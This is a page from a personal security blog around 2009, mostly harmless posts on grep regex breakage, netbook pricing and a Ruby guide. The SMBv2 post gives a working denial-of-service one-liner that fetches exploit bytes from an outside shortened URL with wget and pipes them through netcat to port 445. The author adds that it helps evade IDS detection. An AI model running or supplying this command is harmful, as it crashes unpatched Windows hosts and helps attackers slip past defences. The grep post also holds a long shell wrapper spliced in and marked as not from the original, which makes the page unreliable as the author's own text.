Friday, February 05, 2010

Hey, I'm on Metasploit, now

Just published my first Metasploit Blog Post. Whee, unauthenticated fingerprinting is my favorite and my best.


Monday, December 28, 2009

Grep 2.5.4 breaks regular expression syntax

Backwards compatibility is for chumps, apparently. GNU Grep version 2.5.4 fundamentally changes regular expression syntax from the 2.5.3 and prior behavior. The below demonstrates the backwards breakage between 2.5.3 (on box1) and 2.5.4 (on box2).

todb@box1:~$ grep --version
GNU grep 2.5.3

Copyright (C) 1988, 1992-2002, 2004, 2005 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

todb@box1:~$ for i in cat parrot dog monkey
> do echo $i | egrep -v '^(cat|dog)'
> done
parrot
monkey
todb@box1:~$

### Meanwhile, on a system with grep 2.5.4 ###

todb@box2:~$ grep --version
GNU grep 2.5.4

Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.


todb@box2:~$ for i in cat parrot dog monkey
> do echo $i | egrep -v '^(cat|dog)'
> done
cat
parrot
dog
monkey
root@box2:~$

The second fails because the special regex characters, parentheses and pipe, lose their grouping and alternation meanings in 2.5.4. Thus, this works for 2.5.4:

todb@box2:~$ for i in cat parrot dog monkey
> do echo $i | egrep -v '^\(cat\|dog\)'
> done
parrot
monkey

But the same does not work for 2.5.3:

todb@box1:~$ for i in cat parrot dog monkey
> do echo $i | egrep -v '^\(cat\|dog\)'
> done
cat
parrot
dog
monkey
todb@box1:~$

What this all boils down to is that scripts that rely on egrep are going to break pretty horribly and somewhat mysteriously when the underlying grep package gets updated; even better, there's no common method between the two versions to ensure that you get what you expect with a regular expression that involves grouping or alternation.

Naughty, naughty, grep maintainers. Off to submit a bug report now, but since grep 2.5.4 was released way back in February, 2009, I suspect the damage is going to be somewhat unavoidable.

If you know of a way to create a regex that will work in both contexts, I'd love to hear it. Single versus double quotes don't work, so for my purposes, I have to wrap my grep functions up in a version check of grep itself. (grep --version | sed s/[^0-9]*// | head -1 for the curious)
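As an added example (not code from the post), here is a small POSIX sh wrapper that implements the version check described above: grep_version is the post's own pipeline; needs_escaped_ere assumes that only a grep reporting 2.5.4 wants the escaped form shown in the second session; build_anchor_pattern emits the escaped or unescaped pattern accordingly. It also goes one step beyond the post with filter_out_prefixes, which sidesteps grouping and alternation entirely by passing one -e pattern per word, a form both versions accept. The animal list is the post's own input.

```shell
#!/bin/sh
# Added example, not from the original post: choose the egrep syntax
# based on the installed grep version, as the post says it has to.

# The post's own version extraction: strip leading non-digits, keep line 1.
grep_version() {
    grep --version | sed 's/[^0-9]*//' | head -1
}

# Assumption for this example: only grep 2.5.4 wants \( \| \) in egrep.
# Takes the version string as an argument so it can be checked without
# that particular grep installed.
needs_escaped_ere() {
    case "$1" in
        2.5.4*) return 0 ;;
        *)      return 1 ;;
    esac
}

# Print the anchored pattern for an alternation list such as "cat|dog",
# in whichever syntax the given grep version understands.
build_anchor_pattern() {
    ver="$1"
    alts="$2"
    if needs_escaped_ere "$ver"; then
        # 2.5.4 behaviour from the post: escape the grouping and pipe.
        printf '^\\(%s\\)\n' "$(printf '%s' "$alts" | sed 's/|/\\|/g')"
    else
        # 2.5.3 and earlier: plain ERE grouping and alternation.
        printf '^(%s)\n' "$alts"
    fi
}

# Version-independent alternative: one -e per word means no grouping or
# alternation in any single pattern, so neither grep version can mangle it.
# usage: filter_out_prefixes word1 word2 ... < input
filter_out_prefixes() {
    words="$*"
    set --
    for w in $words; do
        set -- "$@" -e "^$w"
    done
    grep -v "$@"
}

# Stand-alone demonstration against the installed grep, using the
# constructed animal list from the post (grep -E is egrep).
demo() {
    pat=$(build_anchor_pattern "$(grep_version)" 'cat|dog')
    printf 'cat\nparrot\ndog\nmonkey\n' | grep -E -v "$pat"
}
```

Run demo on a box to see which pattern the wrapper picked for its grep; filter_out_prefixes is the one to reach for when the script has to survive an unplanned grep upgrade.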


Friday, September 11, 2009

The most implemented exploit ever: SMBv2 Negotiate DoS

Swinging by SecurityFocus' exploit list for the recent SMBv2 denial of service, I was immediately struck by the apparent silliness of listing five separate but nearly identical implementations of the same bug. So struck, I daresay, that I could not resist writing my own stand-alone Ruby version, joking that maybe SecurityFocus will pick it up and make me famous.

Well, they did, and I did lol.

They also picked up I)ruid's much more interesting bash shell version. I thought that opening a socket straight on the command line was strictly the purview of Plan 9, but he proved me wrong.

The most "meta" version, so far, is Brent's wget-to-netcat implementation; I couldn't get it to function exactly as his tweet was written, but here's a version that Works For Me:
for i in `wget http://ur1.ca/bhe8 -q -O-|egrep 'oit.*".*"'|sed 's/s.*[<|=]//g'|sed 's/#.*//g'|sed 's/ "\(.*\)"/\1/'`;do echo -e -n $i;done|nc -w 1 127.0.0.1 445 > /dev/null
This has the added bonus of including some mild fragmentation, making IDS detection a little more squirrelly.

At any rate, I think this is all quite hilarious, and now I'm hopeful that the SMBv2 bug will be the widest-implemented DoS ever.

Update: |)ruid has published a version in Expect

Update: I've published a version in Perl

Update: Someone published a version in Java


Thursday, September 10, 2009

AT&T Netbooks, only $1159

I saw an ad on TV about AT&T practically giving away Acer netbooks. Here's the link of note.

So, it's $199 for a netbook, as long as you sign a two-year contract for a DataConnect plan... and that's where they get you, as they say. $40/month, plus $199, makes this a $1159 computing device over two years. Oh, and the $40/month plan is capped at 200 MB/month. Uhhhhh yeah.

This seems to suck significantly more than I expected.

Back to Plan A, being an Android phone on T-Mobile and a tethered POS laptop. Now to figure out if their data plans are unlimited. (I've been having creeping problems with my BlackBerry 8310, which is why I'm looking at this now.)


Friday, August 21, 2009

Why's (Poignant) Guide to Ruby

Since it appears that Why the Lucky Stiff has rm'ed himself from the Internet (for the time being?), I want to make sure that Why's (Poignant) Guide to Ruby is available for general use -- namely, for my kids, when they're literate enough to learn how to program.

I had the opportunity to meet and work a little with _why in the spring of 2009. Given my very limited exposure to him, both online and in person, I'm not surprised in the least that this happened.

So, here it is, in PDF form -- it's been lurking on my various desktops for a while now, and I give it to anyone who says something like, "Gee, so what's this Ruby all about, anyway?"

I'm sure there are mirrors elsewhere as well, but this one is the only one I can count on.

Why's (Poignant) Guide to Ruby
